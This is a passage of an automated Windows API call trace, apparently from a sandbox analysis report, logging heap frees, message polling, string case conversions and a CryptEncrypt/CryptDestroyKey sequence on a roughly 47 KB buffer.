wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.367] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.367] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.367] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.367] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0255.367] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0255.367] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.367] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.368] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.368] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.368] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0255.368] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0255.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.374] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xbacb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xbad0) returned 1 [0255.374] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.374] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.374] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.374] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.375] CharLowerBuffW (in: lpsz="byte[47824]", cchLength=0xb | out: lpsz="byte[47824]") returned 0xb [0255.375] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.377] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.377] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.377] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.377] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.377] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.377] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.378] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.378] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34b2250*, pdwDataLen=0x8bef68*=0xbacb, dwBufLen=0xbad0 | out: pbData=0x34b2250*, pdwDataLen=0x8bef68*=0xbad0) returned 1 [0255.379] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.379] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.379] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.379] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.380] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.380] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.380] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.380] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0255.381] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.381] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0255.381] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.381] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.381] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0255.382] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.382] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0255.382] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.382] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.382] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.382] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.382] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.382] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.382] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.382] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.382] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.383] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.383] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.383] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.388] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.388] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.388] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.390] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.391] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.391] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0255.391] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.391] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0255.391] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.391] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.391] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.391] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0255.391] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.391] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0255.391] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0255.392] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.392] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0255.392] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.392] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.392] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0255.392] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.392] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0255.392] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.392] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.392] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0255.392] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.393] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0255.393] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.393] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.393] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.393] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.393] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.393] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0255.393] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.393] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0255.393] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0255.393] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.394] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.394] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.394] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 